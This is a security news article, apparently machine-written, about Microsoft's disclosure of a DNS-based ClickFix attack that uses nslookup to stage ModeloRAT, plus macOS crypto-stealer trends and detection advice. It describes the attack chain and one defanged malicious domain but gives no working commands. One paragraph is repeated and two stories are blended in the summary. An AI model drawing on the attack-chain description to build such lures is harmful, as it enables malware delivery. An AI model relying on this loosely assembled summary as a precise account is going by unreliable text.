Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

ClickFix: The Evolving DNS-Based Social Engineering Attack



Microsoft Discloses DNS-Based ClickFix Attack Using Nslookup for Malware Staging

A new version of the ClickFix social engineering tactic has been discovered, which uses DNS as a "lightweight staging or signaling channel" to execute custom payloads. This attack method has spawned several variants and has become widespread over the past two years. The threat actor reaches infrastructure under their control using DNS, erects a new validation layer, and executes a second-stage payload from an external server. This highlights the evolving threat landscape and the increasing sophistication of social engineering tactics used by attackers.

  • The latest version of ClickFix uses DNS as a "lightweight staging or signaling channel" to reach infrastructure under control.
  • The attack chain leads to the download of a ZIP archive and the execution of a malicious Python script, which conducts reconnaissance and drops a VBScript for ModeloRAT.
  • 103 Chrome crypto extensions are targeted by macOS stealers, with attackers using valid Apple developer signatures to bypass Gatekeeper protections.
  • Macs are disproportionately targeted by cryptocurrency thieves due to the irreversible nature of crypto transactions.
  • Organizations with Mac users need detection capabilities for macOS-specific TTPs, including unsigned applications and unusual Terminal activity.


    • Microsoft has disclosed details of a new version of the ClickFix social engineering tactic, which relies on using the "nslookup" (short for nameserver lookup) command to execute a custom DNS lookup triggered via the Windows Run dialog. This attack method has become widespread over the past two years and has spawned several variants, such as FileFix, JackFix, ConsentFix, CrashFix, and GlitchFix.

    The latest version of ClickFix uses DNS as a "lightweight staging or signaling channel," enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload. The downloaded payload subsequently initiates an attack chain that leads to the download of a ZIP archive from an external server ("azwsappdev[.]com"), from which a malicious Python script is extracted and run to conduct reconnaissance, run discovery commands, and drop a Visual Basic Script (VBScript) responsible for launching ModeloRAT, a Python-based remote access trojan previously distributed through CrashFix.

    This new variation of ClickFix uses DNS as a "lightweight staging or signaling channel," enabling the threat actor to reach infrastructure under their control, as well as erect a new validation layer before executing the second-stage payload. The use of ClickFix techniques to target macOS underlines a broader trend where threat actors are increasingly seeking out machines that run Apple's operating system to infect them with infostealers and sophisticated tools.

    According to recent analysis published by Flare, no less than 103 Chrome crypto extensions are targeted by macOS stealers, with attackers obtaining valid Apple developer signatures to bypass Gatekeeper protections. "Nearly every macOS stealer prioritizes cryptocurrency theft above all else," the company said. "This laser focus reflects economic reality. Cryptocurrency users disproportionately use Macs. They often hold significant value in software wallets. Unlike bank accounts, crypto transactions are irreversible. Once seed phrases are compromised, funds disappear permanently with no recourse."

    The 'Macs don't get viruses' assumption is not just outdated but actively dangerous. Organizations with Mac users need detection capabilities for macOS-specific TTPs: unsigned applications requesting passwords, unusual Terminal activity, connections to blockchain nodes for non-financial purposes, and data exfiltration patterns targeting Keychain and browser storage.

    This latest development in the ClickFix attack chain highlights the evolving threat landscape and the increasing sophistication of social engineering tactics used by attackers. It also underscores the importance of vigilance and proactive measures to detect and prevent such attacks, particularly for organizations with Mac users who are disproportionately targeted by these threats.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/ClickFix-The-Evolving-DNS-Based-Social-Engineering-Attack-ehn.shtml

  • https://thehackernews.com/2026/02/microsoft-discloses-dns-based-clickfix.html

  • https://www.securityweek.com/microsoft-warns-of-clickfix-attack-abusing-dns-lookups/

  • https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/

  • https://blog.checkpoint.com/research/filefix-the-new-social-engineering-attack-building-on-clickfix-tested-in-the-wild/

  • https://thehackernews.com/2025/06/new-filefix-method-emerges-as-threat.html

  • https://cybersecuritynews.com/jackfix-attack-leverages-windows-updates/

  • https://thehackernews.com/2025/11/jackfix-uses-fake-windows-update-pop.html

  • https://www.bleepingcomputer.com/news/security/consentfix-debrief-insights-from-the-new-oauth-phishing-attack/

  • https://pushsecurity.com/blog/consentfix

  • https://www.microsoft.com/en-us/security/blog/2026/02/05/clickfix-variant-crashfix-deploying-python-rat-trojan/

  • https://thehackernews.com/2026/01/crashfix-chrome-extension-delivers.html

  • https://censys.com/blog/errtraffic-inside-glitchfix-attack-panel

  • https://thehackernews.com/2026/01/clickfix-attacks-expand-using-fake.html

  • https://malware-guide.com/blog/remove-modelorat


    • Published: Wed Feb 18 14:06:54 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us